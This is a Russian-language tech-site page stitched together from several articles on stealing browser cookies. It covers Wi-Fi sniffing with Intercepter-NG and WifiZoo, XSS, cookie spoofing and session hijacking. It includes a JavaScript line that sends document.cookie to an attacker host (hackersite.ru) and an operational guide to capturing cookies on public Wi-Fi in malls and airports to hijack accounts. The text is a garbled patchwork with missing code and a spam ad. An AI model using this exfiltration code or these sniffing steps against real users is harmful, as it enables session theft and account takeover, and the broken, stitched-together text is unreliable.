Разделы сайта
Выбор редакции:
- Что такое доверительный платёж МТС?
- Программа «Аэрофлот Бонус»: как накопить мили и на что их можно потратить?
- Как узнать какой диск на компьютере: SSD или HDD Как узнать какой ssd стоит на компьютере
- Тестирование Fractal Design Define R5 Fractal Design Define R5 — Тихий, просторный
- Как ускорить "Андроид" - смартфон и планшет?
- Flood Control ВКонтакте: рассказываем почему возникает проблема и как ее можно убрать Значит flood control
- Зарядное устройство на основе блока питания ATX Лабораторный блок питания на шим контроллере 3528
- Что делать если провод не заряжает айфон
- Виртуальная машина для Mac Виртуальная windows на mac os
- Про обслуживание Tele2 Как вводить подтверждение оплаты на номер 312
Реклама
Как перехватывать куки файлы. Простой способ украсть cookie |
О том, чем опасны открытые точки доступа Wifi, о том что могут перехватить пароли. Сегодня рассмотрим перехват паролей по Wi Fi и перехват куки по Wi Fi при помощи программы . Атака будет происходить за счет сниффинга (Sniffing)
.
Sniffing
— sniff переводится как «Нюхать». Сниффинг позволяет анализировать сетевую активность в сети, просматривать какие сайты посещает пользователь и перехватывать пароли. Но может быть использовано и в полезных целях, для прослушки вирусов, которые отправляют какие либо данные в интернет.
Сервис ави1 предлагает умопомрачительно дешевые цены на возможность заказать подписчиков на свой профиль в Инстаграме. Добейтесь увеличения популярности в сети или продаж уже сейчас, не затрачивая массу усилий и времени. Работа с программой Intercepter NG Итак, программа запускается через Intercepter-NG.exe .
Внизу будет видео по настройке (для тех кому удобнее смотреть чем читать).
— Нажимаете кнопку Scan Mode
(значок радара)
Вот собственно и всё, мы рассмотрели перехват паролей по Wi Fi и перехват куки по Wi Fi. Берегите себя Cookies (куки) — информация в виде текстового файла, сохраняемая на компьютере пользователя веб-сайтом. Содержит данные об аутентификации (логин/пароль, ID, номер телефона, адрес почтового ящика), пользовательские настройки, статус доступа. Хранится в профиле браузера. Взлом куки — это кража (или «угон») сессии посетителя веб-ресурса. Закрытая информация становится доступной не только отправителю и получателю, но и ещё третьему лицу — человеку осуществившему перехват. Инструменты и методы взлома кукиУ компьютерных воров, как и у их коллег в реале, помимо навыков, сноровки и знаний, конечно же, есть и свой инструментарий — своеобразный арсенал отмычек и щупов. Ознакомимся с наиболее популярными хитростями хакеров, которые они применяют для выуживания куки у обывателей сети Интернет. СнифферыСпециальные программы для отслеживания и анализа сетевого трафика. Их название происходит от английского глагола «sniff» (нюхать), т.к. в буквальном смысле слова «вынюхивают» передаваемые пакеты между узлами. А вот злоумышленники при помощи сниффера перехватывают сессионые данные, сообщения и другую конфиденциальную информацию. Объектом их атак становятся в основном незащищённые сети, где куки пересылаются в открытой HTTP-сессии, то есть практически не шифруются. (Наиболее уязвимы в этом плане публичные Wi-Fi.) Для внедрения сниффера в интернет-канал между узлом пользователя и веб-сервером используются следующие методы:
Аббревиатура XSS означает Cross Site Scripting — межсайтовый скриптинг. Применяется для атаки на веб-сайты с целью похищения данных пользователя. Принцип действия XSS заключается в следующем:
Для того, чтобы «вживить» программный XSS-механизм, хакеры используют всевозможные уязвимости в веб-серверах, онлайн-сервисах и браузерах. Все XSS-уязвимости разделяются на два типа:
Хакеры тщательно «камуфлируют» свои XSS-скрипты, чтобы жертва ничего не заподозрила. Меняют расширение файлов, выдают код за картинку, мотивируют пройти по ссылке, привлекают интересным контентом. В итоге: пользователь ПК, не совладавший с собственным любопытством, своей же рукой (кликом мышки) отправляет куки сессии (с логином и паролем!) автору XSS-скрипта — компьютерному злодею. Подмена кукиВсе куки сохраняются и отправляются на веб-сервер (с которого они «пришли») без каких-либо изменений — в первозданном виде — с такими же значениями, строками и другими данными. Умышленная модификация их параметров называется подменна куки. Другими словами говоря, при подмене куки злоумышленник выдаёт желаемое за действительное. Например, при осуществлении платежа в интернет-магазине, в куки изменяется сумма оплаты в меньшую сторону — таким образом происходит «экономия» на покупках. Украденные куки сессии в соцсети с чужого аккаунта «подкладываются» в другую сессию и на другом ПК. Владелец украденных кук получает полный доступ к аккаунту жертвы (переписка, контент, настройки страницы) до тех пор пока, она будет находится на своей странице. «Редактирование» кук осуществляется при помощи:
Физический доступ к даннымОчень простая схема по реализации, состоит из нескольких шагов. Но действенна лишь в том случае, если компьютер жертвы с открытой сессией, например Вконтакте, оставлен без присмотра (и достаточно надолго!):
Как правило, хакеры используют вышеперечисленные инструменты (+ другие) как в комплексе (поскольку уровень защиты на многих веб-ресурсах достаточно высок), так и по отдельности (когда пользователи проявляют чрезмерную наивность). XSS + сниффер
Защита cookies от взлома
И самое главное — не теряйте бдительность и внимание во время отдыха или работы в Интернете! Что такое же cookie?
Существует механизм, позволяющий http-серверу сохранять на компьютере пользователя некоторую текстовую информацию, а потом к ней обращаться. Данная информация называется cookie. По сути, каждая cookie - это пара: название параметра и его значение. Также каждой cookie присваивается домен, к которому она относится. В целях безопасности во всех браузерах http-серверу позволено лишь обращаться к cookie своего домена. Дополнительно cookie может иметь дату истечения, тогда они будут хранится на компьютере до этой даты, даже если закрыть все окна браузера. Почему cookie важны? Во всех многопользовательских системах cookie используются для идентификации пользователя. Вернее, текущего соединения пользователя с сервисом, пользовательской сессии. Если кто-то узнает Ваши cookie, то сможет зайти в систему от Вашего имени. Потому, что в настоящий момент очень мало интернет-ресурсов проверяет смену IP-адреса в течении одной пользовательской сессии. Как изменить или подменить cookie? Разработчики браузеров не предоставляют встроенных средств для редактирования cookie. Но можно обойтись и обычным блокнотом (notepad). Шаг 1: создаем текстовый файл с текстом Windows Registry Editor Version 5.00
Сохраняем его под именем IE_ext.reg Шаг 2: С помощью созданного файла добавляем изменения в реестр Windows. Шаг 3: создаем текстовый файл с текстом <
script
language
="javascript">
script > Сохраняем его под именем C:\IE_ext.htm Шаг 4: Заходим на интересующий нас интернет-сайт. Шаг 5: Правой кнопкой мыши кликам на свободном месте странице и выбираем пункт меню «Работа с Cookies» . Разрешаем доступ к буферу обмена. В буфер обмена попадут Ваши cookie данного сайт. Можете вставить их блокнот (notepad) и посмотреть. Шаг 6: Для изменения некоторого cookie редактируем файл C:\IE_ext.htm, заменяя testname
на имя cookie, testvalue
- на его значение, testdomain.ru
– на домен сайта. При необходимости добавляем еще подобные строчки. Для удобства контроля я добавил в скрипт вывод текущих cookie до и после изменения: alert(external.menuArguments.document.cookie);
Шаг 7: Выполняем еще раз Шаг 5, а потом обновляем страницу. Итог: мы зайдем на данный интернет-ресурс с обновленными cookie. Как украсть cookie с помощью JavaScript?
Если злоумышленнику удалось найти возможность выполнить произвольный JavaScript-скрипт на компьютере жертвы, то прочитать текущие cookie он может очень легко. Пример: var str= document.cookie; Но сможет ли он их передать на свой сайт, ведь, как я указывал ранее, JavaScript-скрипт не сможет без дополнительного подтверждения обратиться к сайту, находящемуся в другом домене? Оказывается, JavaScript-скрипт может загрузить любую картинку, находящуюся на любом http-сервере. При этом передать любую текстовую информацию в запросе на загрузку этой картинке. Пример: http://hackersite.ru/xss.jpg?text_info Поэтому если выполнить такой код: var img=new Image(); img.src="http://hackersite.ru/xss.jpg?"
+ encodeURI(document.cookie);
то cookie окажутся в запросе на загрузку «картинки» и «уйдут» к злоумышленнику. Как обрабатывать такие запросы на загрузку «картинки»?
Злоумышленнику нужно лишь найти хостинг с поддержкой php и разместить там код подобный такому:
Тогда все параметры запросов к этому скрипту будут сохраняться в файле log.txt . Осталось лишь в ранее описанном JavaScript-скрипте заменить http://hackersite.ru/xss.jpg на путь к данному php-скрипту. Итог Я показал лишь самый простой способ использования XSS-уязвимостей. Но это доказывает, что наличие хотя бы одной такой уязвимостей на многопользовательском интернет-сайте может позволяет злоумышленнику пользоваться его ресурсами от Вашего имени. Замечали ли Вы, что возвращаясь на сайт, который Вы когда-то уже посещали, что сайт узнаёт Вас и открывается с настройками, которые Вы в прошлый раз применили? Да, и довольно часто? Это происходит благодаря файлам cookies, которые хранят о посетителях такую информацию, как логин, пароль, идентификатор сессии и прочие переменные, требуемые для идентификации посетителя и отображения контента страницы согласно предпочтений пользователя, выбранных им при прошлом посещении ресурса. Программа WebCookiesSniffer покажет пользователю файлы куки и их содержание сайтов, которые просматриваются пользователем в браузере. Просмотр файлов CookiesВы открываете сайт, а WebCookiesSniffer осуществляет захват файлов cookies в режиме реального времени. Все пойманные куки утилита добавляет в таблицу, в которой хранятся данные о хосте, пути запроса, общей длине файла куки, количестве переменных в файле куки и собственно сама Cookie-строка с названиями переменных и значений. Собранную информацию о cookies файлах WebCookiesSniffer может сохранить в текстовый файл. Также в программе есть возможность сформировать HTML-отчет по всем или по выбранным файлам cookies. Для работы программы необходимо установить драйвер WinPcap (лежит в архиве вместе с WebCookiesSniffer). Чтобы язык программы WebCookiesSniffer стал русским, скопируйте в каталог с утилитой файл WebCookiesSniffer_lng.ini (также вложен в архив). Скриншоты программы WebCookiesSniffer
Здраствуйте, эту небольшую статью, скорее даже краткое описание я бы хотел посвятить самому простому способу перехвата cookies файлов в wi-fi сети. Что такое cookies и зачем они нужны, я здесь рассказывать небуду, если человек задался идеей перехвата "выпечки"; в беспроводной сети, я думаю он должен знать, что это такое и зачем ему это надо. Скажу лишь одно, с помощью этих файлов можно получить доступ к чужим аккаунтам на различных сайтах, требующих от пользователей прохождения процесса аутентификации (Например mail.ru, vkontakte.ru и т.д.). Итак приступим. Для начала нам нужно найти саму беспроводную сеть, с открытым шлюзом доступа в интернет, и желательно, чтобы у данной сети было достаточно много клиентов. Например, подойдет любая сеть в крупных торговых центрах, аэропортах, различных кофейнях, в таких местах люди обычно пользуются wi-fi доступом в интернет, для чтения почты, проверки аккаунтов на различных сайтах знакомств, просмотр жж и всевозможных форумов. Это все, как раз то, что нам и нужно. Определившись с выбором местоположения сети, изучив определенные часы максимального количества клиентов, перейдем непосредственно к боевым действиям. Для этого нам понадобиться ноутбук, с wi-fi адаптером, и определенным набором программ. В моем случае, я пользовался ноутбуком Acer Aspire 3610, клиентской wi-fi карточкой D-Link DWL G650 и установленной ОС BackTrack3. Я советую вам использовать данную ОС, так как в нее уже включен весь набор программ который может понадобиться, и самое главное достоинство, то, что вам не обязательно ставить Backtrack на ваш жесткий диск, эту ОС вы можете загружать непосредственно с cd-диска или flash накопителя. Теперь перейдем к необходимому програмному обеспечению. Я использовал kismet для обнаружение сетей, и WifiZoo, для перехвата cookies. Остановлюсь подробно на второй программе. WifiZoo является пассивным сканером эфира и собирает довольно много полезной информации, такую как: pop3, smtp traffic, http cookies/authinfo, msn, ftp credentials, telnet network traffic, nbt, и т.д. Единственный недостаток этой программы это отсутсвие режима Channel hopping, WifiZoo просто прослушивает беспроводной интерфейс, и не может, если можно так выразиться прыгать с канала на канал. Но этот недостаток компенсируется с помощью другой программы, Kismet, которая поддерживает этот режим. Для запуска WifiZoo вам понадобиться:
Итак запускаем программу, для начала запустим Kismet, для поддержки режима channel hopping, далее запускаем непосредственно WifiZoo, перед вами должно появиться вот такое окно: Теперь осталось только сидеть и ждать пока вы чтонибудь перехватите, все что перехватывает программа можно найти в логах, которые находятся в директории с программой /logs/. Так же вы можете запустить GUI интерфейс, который автоматически поднимается на http по адрессу 127.0.0.1:8000 Писать про все особенности этой замечательной программы я не буду, думаю вы сами разберетесь в остальных возможностях, и так как в данный момент нас интересуют только cookies. Кликаем по ссылке с надписью cookies и смотрим, что же мы перехватили: |
Популярное:
Новое
- Программа «Аэрофлот Бонус»: как накопить мили и на что их можно потратить?
- Как узнать какой диск на компьютере: SSD или HDD Как узнать какой ssd стоит на компьютере
- Тестирование Fractal Design Define R5 Fractal Design Define R5 — Тихий, просторный
- Как ускорить "Андроид" - смартфон и планшет?
- Flood Control ВКонтакте: рассказываем почему возникает проблема и как ее можно убрать Значит flood control
- Зарядное устройство на основе блока питания ATX Лабораторный блок питания на шим контроллере 3528
- Что делать если провод не заряжает айфон
- Виртуальная машина для Mac Виртуальная windows на mac os
- Про обслуживание Tele2 Как вводить подтверждение оплаты на номер 312
- Работа с внутренней памятью EEPROM Eeprom стирание